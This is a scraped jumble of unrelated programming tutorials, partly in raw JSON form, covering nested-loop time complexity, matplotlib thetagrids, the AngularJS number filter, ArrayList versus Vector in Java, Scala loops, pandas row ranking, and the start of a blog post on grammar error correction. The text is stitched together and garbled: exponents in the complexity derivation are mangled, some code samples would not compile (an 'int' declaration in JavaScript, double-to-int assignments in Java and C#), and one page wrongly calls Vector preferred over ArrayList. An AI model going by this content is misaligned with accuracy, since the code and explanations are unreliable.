Preorder and Postorder) SQL | Join (Inner, Left, Right and Full Joins) find command in Linux with examples SQL Interview Questions How to write a Pseudo Code?
[ { "code": null, "e": 25679, "s": 25651, "text": "\n30 Dec, 2021" }, { "code": null, "e": 25730, "s": 25679, "text": "What is the time complexity of the below function?" }, { "code": null, "e": 25734, "s": 25730, "text": "C++" }, { "code": null, "e": 25736, "s": 25734, "text": "C" }, { "code": null, "e": 25741, "s": 25736, "text": "Java" }, { "code": null, "e": 25749, "s": 25741, "text": "Python3" }, { "code": null, "e": 25752, "s": 25749, "text": "C#" }, { "code": null, "e": 25763, "s": 25752, "text": "Javascript" }, { "code": "void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh", "e": 25984, "s": 25763, "text": null }, { "code": "void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }}", "e": 26160, "s": 25984, "text": null }, { "code": "static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = Math.pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616", "e": 26391, "s": 26160, "text": null }, { "code": "def fun(n, k): for i in range(1, n + 1): p = pow(i, k) for j in range(1, p + 1): # Some O(1) work # This code is contributed by Shubham Singh", "e": 26575, "s": 26391, "text": null }, { "code": "static void fun(int n, int k){ for (int i = 1; i <= n; i++) { int p = Math.Pow(i, k); for (int j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by umadevi9616", "e": 26806, "s": 26575, "text": null }, { "code": "<script> // JavaScript program for the above approachfunction fun(n, k){ for(let i = 1; i <= n; i++) { int p = Math.pow(i, k); for (let j = 1; j <= p; j++) { // Some O(1) work } }} // This code is contributed by Shubham Singh </script>", "e": 27090, "s": 26806, "text": null }, { "code": null, "e": 27166, "s": 27090, "text": "Time complexity of above function can be written as 1k + 2k + 3k + ... n1k." }, { "code": null, "e": 27192, "s": 27166, "text": "Let us try few examples: " }, { "code": null, "e": 27414, "s": 27192, "text": "k=1\nSum = 1 + 2 + 3 ... n \n = n(n+1)/2 \n = n2/2 + n/2\n\nk=2\nSum = 12 + 22 + 32 + ... n12.\n = n(n+1)(2n+1)/6\n = n3/3 + n2/2 + n/6\n\nk=3\nSum = 13 + 23 + 33 + ... n13.\n = n2(n+1)2/4\n = n4/4 + n3/2 + n2/4 " }, { "code": null, "e": 27626, "s": 27414, "text": "In general, asymptotic value can be written as (nk+1)/(k+1) + Θ(nk)If n>=k then the time complexity will be considered in O((nk+1)/(k+1)) and if n<k, then the time complexity will be considered as in the O(nk)" }, { "code": null, "e": 27750, "s": 27626, "text": "Please write comments if you find anything incorrect, or you want to share more information about the topic discussed above" }, { "code": null, "e": 27764, "s": 27750, "text": "biplab_prasad" }, { "code": null, "e": 27780, "s": 27764, "text": "rohitnandi01234" }, { "code": null, "e": 27792, "s": 27780, "text": "umadevi9616" }, { "code": null, "e": 27807, "s": 27792, "text": "SHUBHAMSINGH10" }, { "code": null, "e": 27823, "s": 27807, "text": "time complexity" }, { "code": null, "e": 27832, "s": 27823, "text": "Analysis" }, { "code": null, "e": 27841, "s": 27832, "text": "Articles" }, { "code": null, "e": 27939, "s": 27841, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 27990, "s": 27939, "text": "Understanding Time Complexity with Simple Examples" }, { "code": null, "e": 28027, "s": 27990, "text": "Time Complexity and Space Complexity" }, { "code": null, "e": 28110, "s": 28027, "text": "Complexity of different operations in Binary tree, Binary Search Tree and AVL tree" }, { "code": null, "e": 28150, "s": 28110, "text": "Analysis of Algorithms | Big-O analysis" }, { "code": null, "e": 28191, "s": 28150, "text": "Analysis of different sorting techniques" }, { "code": null, "e": 28241, "s": 28191, "text": "Tree Traversals (Inorder, Preorder and Postorder)" }, { "code": null, "e": 28288, "s": 28241, "text": "SQL | Join (Inner, Left, Right and Full Joins)" }, { "code": null, "e": 28324, "s": 28288, "text": "find command in Linux with examples" }, { "code": null, "e": 28348, "s": 28324, "text": "SQL Interview Questions" } ]
Matplotlib.pyplot.thetagrids() in Python - GeeksforGeeks
29 Jul, 2021 Matplotlib is a plotting library of Python programming language and its numerical mathematics module is NumPy. matplotlib.pyplot is a collection of command style functions that make matplotlib work like the MATLAB Tool. Each of the pyplot functions makes certain changes to a figure: e.g., creating a figure, creating a plot area in a figure, plots some lines in a plotting area or decorate the plot with labels, etc.Note: For more information, refer to Pyplot in Matplotlib Set the theta locations of the gridlines in the polar plot. If no arguments are passed, it returns a tuple (lines, labels) where lines are an array of radial gridlines (Line2D instances) and labels is an array of tick labels (Text instances): Syntax: lines, labels = thetagrids(angles, labels=None, fmt=’%d’, frac = 1.5)Parameters: Angles: set the angles to the place of theta grids (these gridlines are equal along the theta dimension) labels: if not None, then it is len(angles) or list of strings of the labels to use at each angle. If labels are None, the labels will be fmt%angle. frac: It is the fraction of the polar axes radius at the place of label (1 is the edge). e.g., 1.25 is outside the axes and 0.75 is inside the axes. Return Type: Return value is a list of tuples (lines, labels)Note: lines are Line2D instances, labels are Text instances. Return Type: Return value is a list of tuples (lines, labels)Note: lines are Line2D instances, labels are Text instances. Example: Python3 import matplotlib.pyplot as pltimport numpy as np employee = ["Rahul", "Joy", "Abhishek", "Tina", "Sneha"] actual = [41, 57, 59, 63, 52, 41]expected = [40, 59, 58, 64, 55, 40] # Initialing the spiderplot by # setting figure size and polar# projectionplt.figure(figsize =(10, 6))plt.subplot(polar = True) theta = np.linspace(0, 2 * np.pi, len(actual)) # Arranging the grid into number # of sales into equal parts in# degreeslines, labels = plt.thetagrids(range(0, 360, int(360/len(employee))), (employee)) # Plot actual sales graphplt.plot(theta, actual)plt.fill(theta, actual, 'b', alpha = 0.1) # Plot expected sales graphplt.plot(theta, expected) # Add legend and title for the plotplt.legend(labels =('Actual', 'Expected'), loc = 1)plt.title("Actual vs Expected sales by Employee") # Display the plot on the screenplt.show() Output: singghakshay Python-matplotlib Python Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. How to Install PIP on Windows ? Check if element exists in list in Python How To Convert Python Dictionary To JSON? How to drop one or multiple columns in Pandas Dataframe Python Classes and Objects Python | os.path.join() method Python | Pandas dataframe.groupby() Create a directory in Python Defaultdict in Python Python | Get unique values from a list
[ { "code": null, "e": 25647, "s": 25619, "text": "\n29 Jul, 2021" }, { "code": null, "e": 26123, "s": 25647, "text": "Matplotlib is a plotting library of Python programming language and its numerical mathematics module is NumPy. matplotlib.pyplot is a collection of command style functions that make matplotlib work like the MATLAB Tool. Each of the pyplot functions makes certain changes to a figure: e.g., creating a figure, creating a plot area in a figure, plots some lines in a plotting area or decorate the plot with labels, etc.Note: For more information, refer to Pyplot in Matplotlib " }, { "code": null, "e": 26368, "s": 26125, "text": "Set the theta locations of the gridlines in the polar plot. If no arguments are passed, it returns a tuple (lines, labels) where lines are an array of radial gridlines (Line2D instances) and labels is an array of tick labels (Text instances):" }, { "code": null, "e": 26459, "s": 26370, "text": "Syntax: lines, labels = thetagrids(angles, labels=None, fmt=’%d’, frac = 1.5)Parameters:" }, { "code": null, "e": 26467, "s": 26459, "text": "Angles:" }, { "code": null, "e": 26564, "s": 26467, "text": "set the angles to the place of theta grids (these gridlines are equal along the theta dimension)" }, { "code": null, "e": 26572, "s": 26564, "text": "labels:" }, { "code": null, "e": 26714, "s": 26572, "text": "if not None, then it is len(angles) or list of strings of the labels to use at each angle. If labels are None, the labels will be fmt%angle. " }, { "code": null, "e": 26986, "s": 26714, "text": "frac: It is the fraction of the polar axes radius at the place of label (1 is the edge). e.g., 1.25 is outside the axes and 0.75 is inside the axes. Return Type: Return value is a list of tuples (lines, labels)Note: lines are Line2D instances, labels are Text instances." }, { "code": null, "e": 27108, "s": 26986, "text": "Return Type: Return value is a list of tuples (lines, labels)Note: lines are Line2D instances, labels are Text instances." }, { "code": null, "e": 27118, "s": 27108, "text": "Example: " }, { "code": null, "e": 27126, "s": 27118, "text": "Python3" }, { "code": "import matplotlib.pyplot as pltimport numpy as np employee = [\"Rahul\", \"Joy\", \"Abhishek\", \"Tina\", \"Sneha\"] actual = [41, 57, 59, 63, 52, 41]expected = [40, 59, 58, 64, 55, 40] # Initialing the spiderplot by # setting figure size and polar# projectionplt.figure(figsize =(10, 6))plt.subplot(polar = True) theta = np.linspace(0, 2 * np.pi, len(actual)) # Arranging the grid into number # of sales into equal parts in# degreeslines, labels = plt.thetagrids(range(0, 360, int(360/len(employee))), (employee)) # Plot actual sales graphplt.plot(theta, actual)plt.fill(theta, actual, 'b', alpha = 0.1) # Plot expected sales graphplt.plot(theta, expected) # Add legend and title for the plotplt.legend(labels =('Actual', 'Expected'), loc = 1)plt.title(\"Actual vs Expected sales by Employee\") # Display the plot on the screenplt.show()", "e": 28055, "s": 27126, "text": null }, { "code": null, "e": 28064, "s": 28055, "text": "Output: " }, { "code": null, "e": 28079, "s": 28066, "text": "singghakshay" }, { "code": null, "e": 28097, "s": 28079, "text": "Python-matplotlib" }, { "code": null, "e": 28104, "s": 28097, "text": "Python" }, { "code": null, "e": 28202, "s": 28104, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 28234, "s": 28202, "text": "How to Install PIP on Windows ?" }, { "code": null, "e": 28276, "s": 28234, "text": "Check if element exists in list in Python" }, { "code": null, "e": 28318, "s": 28276, "text": "How To Convert Python Dictionary To JSON?" }, { "code": null, "e": 28374, "s": 28318, "text": "How to drop one or multiple columns in Pandas Dataframe" }, { "code": null, "e": 28401, "s": 28374, "text": "Python Classes and Objects" }, { "code": null, "e": 28432, "s": 28401, "text": "Python | os.path.join() method" }, { "code": null, "e": 28468, "s": 28432, "text": "Python | Pandas dataframe.groupby()" }, { "code": null, "e": 28497, "s": 28468, "text": "Create a directory in Python" }, { "code": null, "e": 28519, "s": 28497, "text": "Defaultdict in Python" } ]
AngularJS | number Filter - GeeksforGeeks
07 May, 2019 AngularJS number filter is used to convert a number into string or text. We can also define a limit to display a number of decimal digits. Number filter rounds off the number to specified decimal digits. Syntax: {{ string| number : fractionSize}} Parameter Values: It contains single parameter value fractionsize which is of type number and used to specify the number of decimals. Example 1: This example format the number and set it into the fraction with two decimal place. <!DOCTYPE html><html> <head> <title>Number Filter</title> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js"> </script> </head> <body> <div ng-app="gfgApp" ng-controller="numberCntrl"> <h3>Number filter with fraction size.</h3> <p>Number : {{ value| number : 2}}</p> </div> <script> var app = angular.module('gfgApp', []); app.controller('numberCntrl', function($scope) { $scope.value = 75598.548; }); </script> </body></html> Output: Example 2: This example format the number and set it into the fraction with three decimal place. <!DOCTYPE html><html> <head> <title>Number Filter</title> <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js"> </script> </head> <body> <div ng-app="gfgApp" ng-controller="numberCntrl"> <h3>Number filter without fraction size.</h3> <p>Number : {{ value| number}}</p> </div> <script> var app = angular.module('gfgApp', []); app.controller('numberCntrl', function($scope) { $scope.value = 524598.54812; }); </script> </body></html> Output: Picked AngularJS Web Technologies Writing code in comment? Please use ide.geeksforgeeks.org, generate link and share the link here. Angular File Upload Angular PrimeNG Dropdown Component Angular | keyup event Auth Guards in Angular 9/10/11 How to Display Spinner on the Screen till the data from the API loads using Angular 8 ? Remove elements from a JavaScript Array Installation of Node.js on Linux Convert a string to an integer in JavaScript How to fetch data from an API in ReactJS ? How to insert spaces/tabs in text using HTML/CSS?
[ { "code": null, "e": 29516, "s": 29488, "text": "\n07 May, 2019" }, { "code": null, "e": 29720, "s": 29516, "text": "AngularJS number filter is used to convert a number into string or text. We can also define a limit to display a number of decimal digits. Number filter rounds off the number to specified decimal digits." }, { "code": null, "e": 29728, "s": 29720, "text": "Syntax:" }, { "code": null, "e": 29764, "s": 29728, "text": "{{ string| number : fractionSize}}\n" }, { "code": null, "e": 29898, "s": 29764, "text": "Parameter Values: It contains single parameter value fractionsize which is of type number and used to specify the number of decimals." }, { "code": null, "e": 29993, "s": 29898, "text": "Example 1: This example format the number and set it into the fraction with two decimal place." }, { "code": "<!DOCTYPE html><html> <head> <title>Number Filter</title> <script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js\"> </script> </head> <body> <div ng-app=\"gfgApp\" ng-controller=\"numberCntrl\"> <h3>Number filter with fraction size.</h3> <p>Number : {{ value| number : 2}}</p> </div> <script> var app = angular.module('gfgApp', []); app.controller('numberCntrl', function($scope) { $scope.value = 75598.548; }); </script> </body></html>", "e": 30609, "s": 29993, "text": null }, { "code": null, "e": 30617, "s": 30609, "text": "Output:" }, { "code": null, "e": 30714, "s": 30617, "text": "Example 2: This example format the number and set it into the fraction with three decimal place." }, { "code": "<!DOCTYPE html><html> <head> <title>Number Filter</title> <script src=\"https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js\"> </script> </head> <body> <div ng-app=\"gfgApp\" ng-controller=\"numberCntrl\"> <h3>Number filter without fraction size.</h3> <p>Number : {{ value| number}}</p> </div> <script> var app = angular.module('gfgApp', []); app.controller('numberCntrl', function($scope) { $scope.value = 524598.54812; }); </script> </body></html>", "e": 31331, "s": 30714, "text": null }, { "code": null, "e": 31339, "s": 31331, "text": "Output:" }, { "code": null, "e": 31346, "s": 31339, "text": "Picked" }, { "code": null, "e": 31356, "s": 31346, "text": "AngularJS" }, { "code": null, "e": 31373, "s": 31356, "text": "Web Technologies" }, { "code": null, "e": 31471, "s": 31373, "text": "Writing code in comment?\nPlease use ide.geeksforgeeks.org,\ngenerate link and share the link here." }, { "code": null, "e": 31491, "s": 31471, "text": "Angular File Upload" }, { "code": null, "e": 31526, "s": 31491, "text": "Angular PrimeNG Dropdown Component" }, { "code": null, "e": 31548, "s": 31526, "text": "Angular | keyup event" }, { "code": null, "e": 31579, "s": 31548, "text": "Auth Guards in Angular 9/10/11" }, { "code": null, "e": 31667, "s": 31579, "text": "How to Display Spinner on the Screen till the data from the API loads using Angular 8 ?" }, { "code": null, "e": 31707, "s": 31667, "text": "Remove elements from a JavaScript Array" }, { "code": null, "e": 31740, "s": 31707, "text": "Installation of Node.js on Linux" }, { "code": null, "e": 31785, "s": 31740, "text": "Convert a string to an integer in JavaScript" }, { "code": null, "e": 31828, "s": 31785, "text": "How to fetch data from an API in ReactJS ?" } ]
Difference Between ArrayList and Vector in Java
In this post, we will understand the difference between ArrayList and Vector in Java. It is not synchronized. It is not synchronized. If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent. If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent. It is not thread-safe. It is not thread-safe. It was introduced in JDK 1.2. It was introduced in JDK 1.2. it can only use iterator to traverse. it can only use iterator to traverse. Since it is non-synchronized, it is quick. Since it is non-synchronized, it is quick. It uses the Iterator interface to traverse through the elements. It uses the Iterator interface to traverse through the elements. ArrayList<T> al = new ArrayList<T>(); It is synchronized. It is synchronized. It is thread safe. It is thread safe. It is a legacy class. It is a legacy class. It is slow, since it is synchronized. It is slow, since it is synchronized. If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent. If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent. It can use enumerator and iterator to traverse. It can use enumerator and iterator to traverse. It is preferred over ArrayList. It is preferred over ArrayList. It provides a multi-threading environment. It provides a multi-threading environment. It holds other threads in the runnable or non-runnable state, until the current thread releases the lock on the specific object. It holds other threads in the runnable or non-runnable state, until the current thread releases the lock on the specific object. It can use either the ‘Iterator’ interface or the Enumeration interface to traverse through the elements. It can use either the ‘Iterator’ interface or the Enumeration interface to traverse through the elements. Vector<T> v = new Vector<T>();
[ { "code": null, "e": 1148, "s": 1062, "text": "In this post, we will understand the difference between ArrayList and Vector in Java." }, { "code": null, "e": 1172, "s": 1148, "text": "It is not synchronized." }, { "code": null, "e": 1196, "s": 1172, "text": "It is not synchronized." }, { "code": null, "e": 1313, "s": 1196, "text": "If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent." }, { "code": null, "e": 1430, "s": 1313, "text": "If the number of elements exceeds the capacity of the ArrayList, it increments the current array size by 50 percent." }, { "code": null, "e": 1453, "s": 1430, "text": "It is not thread-safe." }, { "code": null, "e": 1476, "s": 1453, "text": "It is not thread-safe." }, { "code": null, "e": 1506, "s": 1476, "text": "It was introduced in JDK 1.2." }, { "code": null, "e": 1536, "s": 1506, "text": "It was introduced in JDK 1.2." }, { "code": null, "e": 1574, "s": 1536, "text": "it can only use iterator to traverse." }, { "code": null, "e": 1612, "s": 1574, "text": "it can only use iterator to traverse." }, { "code": null, "e": 1655, "s": 1612, "text": "Since it is non-synchronized, it is quick." }, { "code": null, "e": 1698, "s": 1655, "text": "Since it is non-synchronized, it is quick." }, { "code": null, "e": 1763, "s": 1698, "text": "It uses the Iterator interface to traverse through the elements." }, { "code": null, "e": 1828, "s": 1763, "text": "It uses the Iterator interface to traverse through the elements." }, { "code": null, "e": 1866, "s": 1828, "text": "ArrayList<T> al = new ArrayList<T>();" }, { "code": null, "e": 1886, "s": 1866, "text": "It is synchronized." }, { "code": null, "e": 1906, "s": 1886, "text": "It is synchronized." }, { "code": null, "e": 1925, "s": 1906, "text": "It is thread safe." }, { "code": null, "e": 1944, "s": 1925, "text": "It is thread safe." }, { "code": null, "e": 1966, "s": 1944, "text": "It is a legacy class." }, { "code": null, "e": 1988, "s": 1966, "text": "It is a legacy class." }, { "code": null, "e": 2026, "s": 1988, "text": "It is slow, since it is synchronized." }, { "code": null, "e": 2064, "s": 2026, "text": "It is slow, since it is synchronized." }, { "code": null, "e": 2179, "s": 2064, "text": "If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent." }, { "code": null, "e": 2294, "s": 2179, "text": "If the number of elements exceeds the capacity of the Vector, it increments the current array size by 100 percent." }, { "code": null, "e": 2342, "s": 2294, "text": "It can use enumerator and iterator to traverse." }, { "code": null, "e": 2390, "s": 2342, "text": "It can use enumerator and iterator to traverse." }, { "code": null, "e": 2422, "s": 2390, "text": "It is preferred over ArrayList." }, { "code": null, "e": 2454, "s": 2422, "text": "It is preferred over ArrayList." }, { "code": null, "e": 2497, "s": 2454, "text": "It provides a multi-threading environment." }, { "code": null, "e": 2540, "s": 2497, "text": "It provides a multi-threading environment." }, { "code": null, "e": 2669, "s": 2540, "text": "It holds other threads in the runnable or non-runnable state, until the current thread releases the lock on the specific object." }, { "code": null, "e": 2798, "s": 2669, "text": "It holds other threads in the runnable or non-runnable state, until the current thread releases the lock on the specific object." }, { "code": null, "e": 2904, "s": 2798, "text": "It can use either the ‘Iterator’ interface or the Enumeration interface to traverse through the elements." }, { "code": null, "e": 3010, "s": 2904, "text": "It can use either the ‘Iterator’ interface or the Enumeration interface to traverse through the elements." }, { "code": null, "e": 3041, "s": 3010, "text": "Vector<T> v = new Vector<T>();" } ]
Scala - Loop Statements
This chapter takes you through the loop control structures in Scala programming languages. There may be a situation, when you need to execute a block of code several number of times. In general, statements are executed sequentially: The first statement in a function is executed first, followed by the second, and so on. Programming languages provide various control structures that allow for more complicated execution paths. A loop statement allows us to execute a statement or group of statements multiple times and following is the general form of a loop statement in most of the programming languages − Scala programming language provides the following types of loops to handle looping requirements. Click the following links in the table to check their detail. while loop Repeats a statement or group of statements while a given condition is true. It tests the condition before executing the loop body. do-while loop Like a while statement, except that it tests the condition at the end of the loop body. for loop Executes a sequence of statements multiple times and abbreviates the code that manages the loop variable. Loop control statements change execution from its normal sequence. When execution leaves a scope, all automatic objects that were created in that scope are destroyed. As such Scala does not support break or continue statement like Java does but starting from Scala version 2.8, there is a way to break the loops. Click the following links to check the detail. break statement Terminates the loop statement and transfers execution to the statement immediately following the loop. A loop becomes an infinite loop if a condition never becomes false. If you are using Scala, the while loop is the best way to implement infinite loop. The following program implements infinite loop. object Demo { def main(args: Array[String]) { var a = 10; // An infinite loop. while( true ){ println( "Value of a: " + a ); } } } Save the above program in Demo.scala. The following commands are used to compile and execute this program. \>scalac Demo.scala \>scala Demo If you will execute above code, it will go in infinite loop which you can terminate by pressing Ctrl + C keys. Value of a: 10 Value of a: 10 Value of a: 10 Value of a: 10 ................ 82 Lectures 7 hours Arnab Chakraborty 23 Lectures 1.5 hours Mukund Kumar Mishra 52 Lectures 1.5 hours Bigdata Engineer 76 Lectures 5.5 hours Bigdata Engineer 69 Lectures 7.5 hours Bigdata Engineer 46 Lectures 4.5 hours Stone River ELearning Print Add Notes Bookmark this page
[ { "code": null, "e": 2089, "s": 1998, "text": "This chapter takes you through the loop control structures in Scala programming languages." }, { "code": null, "e": 2319, "s": 2089, "text": "There may be a situation, when you need to execute a block of code several number of times. In general, statements are executed sequentially: The first statement in a function is executed first, followed by the second, and so on." }, { "code": null, "e": 2425, "s": 2319, "text": "Programming languages provide various control structures that allow for more complicated execution paths." }, { "code": null, "e": 2606, "s": 2425, "text": "A loop statement allows us to execute a statement or group of statements multiple times and following is the general form of a loop statement in most of the programming languages −" }, { "code": null, "e": 2765, "s": 2606, "text": "Scala programming language provides the following types of loops to handle looping requirements. Click the following links in the table to check their detail." }, { "code": null, "e": 2776, "s": 2765, "text": "while loop" }, { "code": null, "e": 2907, "s": 2776, "text": "Repeats a statement or group of statements while a given condition is true. It tests the condition before executing the loop body." }, { "code": null, "e": 2921, "s": 2907, "text": "do-while loop" }, { "code": null, "e": 3009, "s": 2921, "text": "Like a while statement, except that it tests the condition at the end of the loop body." }, { "code": null, "e": 3018, "s": 3009, "text": "for loop" }, { "code": null, "e": 3124, "s": 3018, "text": "Executes a sequence of statements multiple times and abbreviates the code that manages the loop variable." }, { "code": null, "e": 3484, "s": 3124, "text": "Loop control statements change execution from its normal sequence. When execution leaves a scope, all automatic objects that were created in that scope are destroyed. As such Scala does not support break or continue statement like Java does but starting from Scala version 2.8, there is a way to break the loops. Click the following links to check the detail." }, { "code": null, "e": 3500, "s": 3484, "text": "break statement" }, { "code": null, "e": 3603, "s": 3500, "text": "Terminates the loop statement and transfers execution to the statement immediately following the loop." }, { "code": null, "e": 3754, "s": 3603, "text": "A loop becomes an infinite loop if a condition never becomes false. If you are using Scala, the while loop is the best way to implement infinite loop." }, { "code": null, "e": 3802, "s": 3754, "text": "The following program implements infinite loop." }, { "code": null, "e": 3979, "s": 3802, "text": "object Demo {\n def main(args: Array[String]) {\n var a = 10;\n \n // An infinite loop.\n while( true ){\n println( \"Value of a: \" + a );\n }\n }\n}" }, { "code": null, "e": 4086, "s": 3979, "text": "Save the above program in Demo.scala. The following commands are used to compile and execute this program." }, { "code": null, "e": 4120, "s": 4086, "text": "\\>scalac Demo.scala\n\\>scala Demo\n" }, { "code": null, "e": 4231, "s": 4120, "text": "If you will execute above code, it will go in infinite loop which you can terminate by pressing Ctrl + C keys." }, { "code": null, "e": 4309, "s": 4231, "text": "Value of a: 10\nValue of a: 10\nValue of a: 10\nValue of a: 10\n................\n" }, { "code": null, "e": 4342, "s": 4309, "text": "\n 82 Lectures \n 7 hours \n" }, { "code": null, "e": 4361, "s": 4342, "text": " Arnab Chakraborty" }, { "code": null, "e": 4396, "s": 4361, "text": "\n 23 Lectures \n 1.5 hours \n" }, { "code": null, "e": 4417, "s": 4396, "text": " Mukund Kumar Mishra" }, { "code": null, "e": 4452, "s": 4417, "text": "\n 52 Lectures \n 1.5 hours \n" }, { "code": null, "e": 4470, "s": 4452, "text": " Bigdata Engineer" }, { "code": null, "e": 4505, "s": 4470, "text": "\n 76 Lectures \n 5.5 hours \n" }, { "code": null, "e": 4523, "s": 4505, "text": " Bigdata Engineer" }, { "code": null, "e": 4558, "s": 4523, "text": "\n 69 Lectures \n 7.5 hours \n" }, { "code": null, "e": 4576, "s": 4558, "text": " Bigdata Engineer" }, { "code": null, "e": 4611, "s": 4576, "text": "\n 46 Lectures \n 4.5 hours \n" }, { "code": null, "e": 4634, "s": 4611, "text": " Stone River ELearning" }, { "code": null, "e": 4641, "s": 4634, "text": " Print" }, { "code": null, "e": 4652, "s": 4641, "text": " Add Notes" } ]
Python - Ranking Rows of Pandas DataFrame
To add a column that contains the ranking of each row in the provided data frame that will help us to sort a data frame and determine the rank of a particular element, for example − Now, as you can see in the above example, our rankings are the whole numbers but have a decimal beside it, so that means we can have ranking in real numbers also, and that happens when more and one element have the same rank in the data frame than in such cases our ranking is divided between the elements. Hence, they have a real number as their rank. For assigning the rank to our dataframe’s elements, we use a built-in function of the pandas library that is the .rank() function. We pass the criteria based on which we are ranking the elements to it, and this function returns a new column in each row where the ranking is stored. Code for using the .rank() function is import pandas as pd games = {'Name' : ['Call Of Duty', 'Total Overdose', 'GTA 3', 'Bully'], 'Play Time(in hours)' : ['45', '46', '52', '22'], 'Rate' : ['Better than Average', 'Good', 'Best', 'Average']} df = pd.DataFrame(games) df['ranking'] = df['Play Time(in hours)'].rank(ascending = 0) print(df)# Hello World program in Python print ("Hello World!"); Name Play Time(in hours) Rate ranking 0 Call Of Duty 45 Better than Average 3.0 1 TotalOverdose 46 Good 2.0 2 GTA 3 52 Best 1.0 3 Bully 22 Average 4.0 In this code, we are simply using the built-in function of the panda’s library to rank each element present in the given data frame. We can use the best criteria to rank the elements with the column ‘Play Time(in hours).’ Now we add a column named ‘ranking’ in our data frame and use our .rank() function in it and pass the column name for which we need to do the ranking of our elements (in this case, it is Play Time(in hours) column) now when our new column is created we print our data frame. In this tutorial, we rank the rows in our data frame and then print our data using the pandas library and its built-in functions. Ranking rows of pandas dataframe is an easy process, but you need to follow the above method properly.
[ { "code": null, "e": 1244, "s": 1062, "text": "To add a column that contains the ranking of each row in the provided data frame that will help us to sort a data frame and determine the rank of a particular element, for example −" }, { "code": null, "e": 1597, "s": 1244, "text": "Now, as you can see in the above example, our rankings are the whole numbers but have a decimal beside it, so that means we can have ranking in real numbers also, and that happens when more and one element have the same rank in the data frame than in such cases our ranking is divided between the elements. Hence, they have a real number as their rank." }, { "code": null, "e": 1879, "s": 1597, "text": "For assigning the rank to our dataframe’s elements, we use a built-in function of the pandas library that is the .rank() function. We pass the criteria based on which we are ranking the elements to it, and this function returns a new column in each row where the ranking is stored." }, { "code": null, "e": 1919, "s": 1879, "text": "Code for using the .rank() function is " }, { "code": null, "e": 2293, "s": 1919, "text": "import pandas as pd\ngames = {'Name' : ['Call Of Duty', 'Total Overdose', 'GTA 3', 'Bully'],\n 'Play Time(in hours)' : ['45', '46', '52', '22'],\n 'Rate' : ['Better than Average', 'Good', 'Best', 'Average']}\ndf = pd.DataFrame(games)\ndf['ranking'] = df['Play Time(in hours)'].rank(ascending = 0)\nprint(df)# Hello World program in Python\n \nprint (\"Hello World!\");" }, { "code": null, "e": 2537, "s": 2293, "text": " Name Play Time(in hours) Rate ranking\n0 Call Of Duty 45 Better than Average 3.0\n1 TotalOverdose 46 Good 2.0\n2 GTA 3 52 Best 1.0\n3 Bully 22 Average 4.0" }, { "code": null, "e": 2759, "s": 2537, "text": "In this code, we are simply using the built-in function of the panda’s library to rank each element present in the given data frame. We can use the best criteria to rank the elements with the column ‘Play Time(in hours).’" }, { "code": null, "e": 3034, "s": 2759, "text": "Now we add a column named ‘ranking’ in our data frame and use our .rank() function in it and pass the column name for which we need to do the ranking of our elements (in this case, it is Play Time(in hours) column) now when our new column is created we print our data frame." }, { "code": null, "e": 3267, "s": 3034, "text": "In this tutorial, we rank the rows in our data frame and then print our data using the pandas library and its built-in functions. Ranking rows of pandas dataframe is an easy process, but you need to follow the above method properly." } ]
Grammar Error Correction with Deep Learning | by PUSHAP GANDHI | Towards Data Science
IntroductionProblem DefinitionPrerequisitesData SourceUnderstanding the dataExploratory Data AnalysisData PreprocessingData Preparation and Data PipelineBenchmark Solution(Vanilla Encoder-Decoder Model)Attention MechanismMonotonic AttentionInference (Greedy Search VS BEAM Search)Results and Model ComparisonModel Deployment and PredictionsFuture WorkGithub Repository and LinkedinReferences Introduction Problem Definition Prerequisites Data Source Understanding the data Exploratory Data Analysis Data Preprocessing Data Preparation and Data Pipeline Benchmark Solution(Vanilla Encoder-Decoder Model) Attention Mechanism Monotonic Attention Inference (Greedy Search VS BEAM Search) Results and Model Comparison Model Deployment and Predictions Future Work Github Repository and Linkedin References Grammatical Error Correction as the name suggests is the process by which the detection and correction to an error in the text are done. The problem seems easy to understand but is actually tough due to the diverse vocabulary and set of rules in a language. In addition, we are not only going to identify the mistake but correction is also required. There are immense applications to this problem, the reason being writing is a very common means to share ideas and information. This could help the writer to speed up their work with very minimal chance of error. Moreover, there could be many individuals who are not fluent in a particular language. Therefore, these types of models make sure that language is not a barrier in communication. Now we shall define the task at hand into a machine learning problem. The problem that we are dealing is a type of NLP (Natural Language Processing) problem. NLP is the field of Machine Learning which deals with the interaction between human languages and computers. I would recommend going through this paper to know the progress of approaches used to solve the problem. The approach that we are going to look into is the Sequence to Sequence model. In short out, the deep learning model is going to receive a sequence (incorrect text in this case) and it will output another sequence(corrected text in this case). Now we have defined our problem into a machine learning problem, there is another very integral idea that needs to be dealt with that is performance metric. Performance Metric is a mathematical measure that helps to understand the performance of our machine learning model. A very popular performance metric for the NLP problems is BLEU (Bilingual Evaluation Understudy) Score, hence we are going to use it for our model also. You can refer to this video to know more about the BLEU scores. Before we go into the details of this case study, I assume that the readers know the concepts for Machine Learning and Deep Learning. To be specific, the ideas of LSTMs, Encoder-Decoders, Attention Mechanism should be familiar. I will try to provide some good references on the way. As I mentioned above the problem is tough to handle to which one of the reasons is the nonavailability of a good quality dataset. In my research, I found some of them useful and considered the following two datasets. Lang-8 DatasetNUS Social Media Text Normalization and Translation Corpus Lang-8 Dataset NUS Social Media Text 